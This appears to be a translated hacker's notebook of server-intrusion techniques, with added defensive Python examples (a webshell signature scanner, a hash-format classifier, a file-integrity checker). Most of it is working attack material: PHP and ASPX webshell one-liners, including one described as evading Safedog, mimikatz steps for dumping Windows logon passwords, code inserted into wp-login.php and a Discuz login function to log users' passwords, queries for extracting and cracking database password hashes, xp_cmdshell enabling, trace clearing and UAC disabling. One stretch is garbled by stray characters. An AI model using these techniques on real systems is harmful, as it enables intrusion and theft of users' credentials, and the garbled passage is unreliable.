<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// after using this one, enter the following in the "config" field when setting up the connection in the Caidao one-liner client
Code
<O>h=@eval_r($_POST[c]);</O>
Code
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses restrictions on <?
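The author records these one-liners so they can later be found by keyword. The scanner below is an added example written for this page, not code from the original post: a small Python signature scanner covering each pattern in the list, including the two-step cases where the function name is assembled character by character and then called through a variable, and where include() receives a variable that was filled from $_GET on an earlier line. The PHP sample it runs against is constructed here for illustration; the rule labels and helper names are my own.

```python
import re
from pathlib import Path

# Request superglobals that carry attacker-controlled input.
REQUEST_SRC = r"\$_(?:POST|GET|REQUEST|COOKIE|FILES)"

# Direct signatures: one regex per single-line pattern from the list above.
DIRECT_RULES = [
    (re.compile(rf"\b(?:eval|eval_r|assert)\s*\(\s*@?{REQUEST_SRC}"),
     "eval/assert on request input"),
    (re.compile(r"""preg_replace\s*\(\s*["']/[^"']*/[A-Za-z]*e"""),
     "preg_replace with /e modifier"),
    (re.compile(rf"{REQUEST_SRC}\[[^\]]+\]\s*\("),
     "request value called as a function"),
    (re.compile(rf"\b(?:include|require)(?:_once)?\s*\(?\s*{REQUEST_SRC}"),
     "include of request-controlled path"),
    (re.compile(r"""<script\s+language\s*=\s*["']php["']""", re.I),
     "<script language=php> block"),
]

# Two-step patterns: a variable is filled on one line and abused on a later one.
TAINT_FROM_REQUEST = re.compile(rf"(\$\w+)\s*=\s*@?{REQUEST_SRC}")
CONCAT_NAME = re.compile(r"""(\$\w+)\s*=\s*(?:"[A-Za-z_]"\s*\.\s*){2,}"[A-Za-z_]"\s*;""")


def scan_php(source: str) -> list:
    """Return (line_number, label) findings for one PHP source text."""
    findings = []
    tainted = set()      # variables assigned from request data
    built_names = set()  # variables holding a character-by-character function name
    for no, line in enumerate(source.splitlines(), 1):
        for rule, label in DIRECT_RULES:
            if rule.search(line):
                findings.append((no, label))
        for m in CONCAT_NAME.finditer(line):
            built_names.add(m.group(1))
            findings.append((no, "function name assembled from single characters"))
        for m in TAINT_FROM_REQUEST.finditer(line):
            tainted.add(m.group(1))
        # second-order checks: a variable tainted earlier reaches include() or is called
        for var in sorted(tainted):
            if re.search(rf"\b(?:include|require)(?:_once)?\s*\(?\s*{re.escape(var)}\b", line):
                findings.append((no, f"include of tainted variable {var}"))
        for var in sorted(built_names):
            if re.search(rf"{re.escape(var)}\s*\(", line):
                findings.append((no, f"call through assembled name {var}"))
    return findings


def scan_tree(root: str) -> dict:
    """Scan every .php file under root; returns {relative_path: findings}."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report


# Constructed sample mixing the listed patterns with one harmless line (line 8).
SAMPLE = r"""<?php
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
$filename=$_GET['xbid'];
include ($filename);
$_POST['sa']($_POST['sb']);
@preg_replace("/[email]/e",$_POST['h'],"error");
echo htmlspecialchars($_GET['q']);
?>"""

if __name__ == "__main__":
    for line_no, label in scan_php(SAMPLE):
        print(f"line {line_no}: {label}")
```

The direct rules alone would miss items 1, 2 and 4 above, since the literal strings preg_replace and include never appear next to the request input; the taint and assembled-name passes are what catch those. The harmless htmlspecialchars($_GET['q']) line produces no finding.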

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Quit with exit; do not just close the window, otherwise the system will crash.

http://www.monyer.com/demo/monyerjs/ fairly comprehensive JS decoding site

Automatically check for high-risk system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

One-line ASPX backdoor that gets past Safedog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell to facilitate further social engineering
Add at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
When action=login, the password-logging code is triggered; of course you can also put the code in the default branch of the switch...case statement.
That is, search for case 'login'
and insert it directly below; the logged passwords are written to pwd.txt.
Actually modifying wp-login.php is not a good approach, it is easily discovered; there are other methods, noting this down
Code for bypassing Safedog using the IIS 6 file-parsing vulnerability:
;antian365.asp;antian365.jpg
5 I$ C4 G8 @; i6 K7 `; x+ r+ `' n% m' U
各种类型数据库抓HASH破解最高权限密码!
0 T) C g6 n9 P, Z1.sql server2000
2 u; g U* h4 S* s9 l! F0 zSELECT password from master.dbo.sysxlogins where name='sa'4 j: V2 S+ k7 x+ U+ P w. d2 l; i4 i4 ~
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
3 G, m: c q9 D( G2FD54D6119FFF04129A1D72E7C3194F7284A7F3A+ M# j* Q4 J( }4 D' }' I6 a
( {# g6 P- w) X* A; L/ M# ~, p" C0×0100- constant header4 v7 ^# Y3 M& W2 i. R
34767D5C- salt
1 {! q; v [4 J8 `8 `$ F0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
: N0 r" h: d/ W) b2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash9 ]* `! n6 g* c- v8 O+ v0 [7 {
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
$ P' E- F3 g" _( H- c! q$ q1 XSQL server 2005:-. x7 e; D. I& ~7 Z% f9 d
SELECT password_hash FROM sys.sql_logins where name='sa'; l, B* Q7 v9 F' Z5 G
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
; P5 z9 A; c6 s/ r0 P0 Y: t0×0100- constant header
4 e* y, U1 X: _8 D2 n+ f7 ?7 w993BF231-salt% l3 U7 @9 h0 }2 ~5 ~ D
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash3 F5 ]) v/ u, t/ V2 P' {
crack case sensitive hash in cain, try brute force and dictionary based attacks.3 x# L9 Q8 W) G5 M# j- t
+ L Y' C+ a$ K8 o8 E; J
update:- following bernardo’s comments:-( O: d0 \: h5 S
use function fn_varbintohexstr() to cast password in a hex string.
) i7 \6 }' B) Z3 w# }8 k9 L1 X. ve.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins6 p0 \9 Y" r& f: m2 J
4 l2 J) v/ L9 zMYSQL:-
- G6 f5 Y! x( j L# [7 N1 j/ L
" e0 ]4 S: j# L7 M+ u; d/ D4 aIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
Y5 p" t9 ?% J: F' [# `
* ^/ @& v" C N! ^1 p*mysql < 4.1, o Q( V4 B ?/ v3 i
) U6 U* o" X) D6 @0 D7 |
mysql> SELECT PASSWORD(‘mypass’); h0 v i' c( }
+——————–+, E# g" b+ x) d9 f8 o
| PASSWORD(‘mypass’) |
0 `/ m; ], K* [" | \8 l Y2 Z' I9 b+——————–+
4 J) E' k' L- I, y+ ^0 i8 U| 6f8c114b58f2ce9e |
# w; {% t$ s I+——————–+
8 o, f9 s5 f' A
7 J0 u+ H* _' g*mysql >=4.1
; F2 Z3 m! m! ]+ j+ |0 {' K
5 C- w( M6 A# {/ g& ^; }5 tmysql> SELECT PASSWORD(‘mypass’);: n8 h1 W; g3 g2 g& b% i' u
+——————————————-+
% u ~6 b J0 n| PASSWORD(‘mypass’) |
' o* z n9 J, P9 W l+——————————————-+% f2 D) u% \0 y7 Q
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |8 \$ [1 I' }7 Z- N& Y
+——————————————-+
5 u. C8 N1 l( a: w) T; `; M! L, z1 C2 ~+ `
Select user, password from mysql.user g: V- Z8 `! H. f5 ]3 h0 M! n
The hashes can be cracked in ‘cain and abel’5 e( T/ H! u1 ?
! A* D0 P. K! m& c
Postgres:-3 l* }; U4 ?+ m+ J, s1 I( F5 J3 \
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)' Z1 c6 \' l4 \! |: L' J3 ~
select usename, passwd from pg_shadow;
1 c$ r5 y# o) @. z2 C# C( e/ ^usename | passwd2 V. ?* N. o( \: h: k
——————+————————————-
& o% n, D. x6 i6 b4 q, Z- itestuser | md5fabb6d7172aadfda4753bf0507ed4396
5 y1 w* x3 u; C+ s7 q& p) Duse mdcrack to crack these hashes:-
2 @9 g/ C$ o) ?6 \4 U0 |% b) M$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396% i$ X; @. }7 \4 g+ T9 ?' ]3 o
* U! i+ O5 h* S6 i3 Z( I
Oracle:-
" R' N, L. f; | n4 oselect name, password, spare4 from sys.user$
8 y. n! N( W; X2 nhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
3 v) o2 `5 R7 i0 S4 vMore on Oracle later, i am a bit bored….
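To make the layouts above concrete, here is an added Python example (not from the original post) that classifies a stored credential value by the formats described: SQL Server 2000 (0x0100 header, 8-hex salt, a case-sensitive SHA-1 and a second SHA-1 over the upper-cased password), SQL Server 2005 (header, salt, one SHA-1), MySQL before 4.1 (16 hex), MySQL 4.1 and later ('*' plus 40 hex) and PostgreSQL ('md5' plus 32 hex). It splits out the fields and flags the legacy schemes an audit would want migrated, and reproduces the MySQL 4.1 PASSWORD() computation (SHA-1 of the SHA-1 digest, upper-cased, with a leading '*') so the sample value above can be confirmed. The SQL Server and MySQL samples are the ones quoted in the notes; the PostgreSQL helper appends the username to the password, which is what the --append option above implies, and the function and class names are my own.

```python
import hashlib
import re
from dataclasses import dataclass, field


@dataclass
class StoredHash:
    scheme: str
    fields: dict = field(default_factory=dict)
    weak: bool = False  # legacy layout worth flagging in an audit


# Layouts from the notes above. SQL Server 2000 stores two SHA-1 digests, the
# second computed over the upper-cased password, which is what makes it weak.
MSSQL2000 = re.compile(r"0x0100([0-9A-Fa-f]{8})([0-9A-Fa-f]{40})([0-9A-Fa-f]{40})")
MSSQL2005 = re.compile(r"0x0100([0-9A-Fa-f]{8})([0-9A-Fa-f]{40})")
MYSQL_OLD = re.compile(r"[0-9a-f]{16}")       # pre-4.1, unsalted, 16 hex
MYSQL_41 = re.compile(r"\*([0-9A-F]{40})")    # '*' + SHA1(SHA1(pw))
PG_MD5 = re.compile(r"md5([0-9a-f]{32})")     # 'md5' + MD5(pw || user)


def classify(value: str) -> StoredHash:
    """Identify the stored-hash layout of one credential value and split its fields."""
    v = value.strip()
    m = MSSQL2000.fullmatch(v)
    if m:
        return StoredHash("mssql2000", {"salt": m.group(1).upper(),
                                        "case_sensitive": m.group(2).upper(),
                                        "upper_case": m.group(3).upper()}, weak=True)
    m = MSSQL2005.fullmatch(v)
    if m:
        return StoredHash("mssql2005", {"salt": m.group(1).upper(),
                                        "case_sensitive": m.group(2).upper()})
    if MYSQL_OLD.fullmatch(v):
        return StoredHash("mysql_old", {"hash": v}, weak=True)
    m = MYSQL_41.fullmatch(v)
    if m:
        return StoredHash("mysql41", {"hash": m.group(1)})
    m = PG_MD5.fullmatch(v)
    if m:
        return StoredHash("postgres_md5", {"hash": m.group(1)})
    return StoredHash("unknown")


def mysql41_password(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by upper-hex SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def postgres_md5(password: str, username: str) -> str:
    """pg_shadow form: 'md5' + hex MD5(password || username), username appended."""
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()


def audit(rows) -> list:
    """Given (login, stored_value) pairs, return the logins using a legacy layout."""
    return [login for login, value in rows if classify(value).weak]


if __name__ == "__main__":
    sample = "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F"  # from the notes
    print(classify(sample))
    print(mysql41_password("mypass"))
```

Running it against the page's SQL Server 2005 sample yields scheme mssql2005 with salt 993BF231, and mysql41_password("mypass") reproduces the *6C89...CEF4 value shown in the MySQL table above.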

Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
SQL Server 2008 log clearing; be sure to back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the corresponding entries in the registry under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.
This post was last edited by simeon on 2013-1-3 09:51

Windows 2008 file permission modification
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First look in the right-click menu for "Take ownership as administrator"; if there is no "Take ownership as administrator" entry,

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import the Win7 right-click "Take ownership as administrator" .reg
II. Search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui" files,
1. The "notepad.exe" in C:\Windows does not need to be replaced
2. The "notepad.exe" in C:\Windows\System32 does not need to be replaced
3. Leave the four "notepad.exe.mui" files alone
4. Mainly replace the "notepad.exe" in the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
Replacement method: first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into these two folders,
After replacing, go back to the desktop, create a new txt file and open it to see whether it has changed.
Disabling the security policy in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory; below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
add the code below; csslog.php is generated automatically in the site's ./data/cache/ directory
You can add a view.php in the ipdata directory to view the records; the password is: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);
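Both credential loggers in these notes (the lines added to wp-login.php and to uc_client/client.php) work by editing a core application file and dropping a log file under a cache directory, and the author himself notes that editing wp-login.php is easily discovered. The cheapest way to discover it is a file-integrity check of the web root against a manifest taken from a known-good install. The following Python example is added here and is not code from the original post; the directory layout and file contents it creates in a temporary directory are constructed for the demonstration, and the function names are my own.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large uploads do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in root.rglob("*") if p.is_file()}


def compare(manifest: dict, root: Path) -> dict:
    """Diff a live tree against a known-good manifest.

    Returns {'modified': [...], 'added': [...], 'missing': [...]}; edited core
    files show up as modified, dropped log or shell files as added.
    """
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "added": sorted(p for p in current if p not in manifest),
        "missing": sorted(p for p in manifest if p not in current),
    }


def demo() -> dict:
    """Constructed scenario: a clean tree, then the two tampering patterns above."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "uc_client").mkdir()
        (root / "data" / "cache").mkdir(parents=True)
        (root / "wp-login.php").write_text("<?php // clean login handler\n")
        (root / "uc_client" / "client.php").write_text(
            "<?php function uc_user_login($username, $password) {}\n")
        manifest = build_manifest(root)  # would normally come from a pristine install
        # tampering: extra code appended to wp-login.php, a new file dropped under data/cache
        with (root / "wp-login.php").open("a") as f:
            f.write("// extra code appended after the manifest was taken\n")
        (root / "data" / "cache" / "csslog.php").write_text("<?exit();?>\n")
        return compare(manifest, root)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In practice the manifest is generated from a pristine copy of the same application version and stored off-host, and the comparison is scheduled; files appearing under writable cache or upload directories with a .php extension deserve the same scrutiny as modified core files.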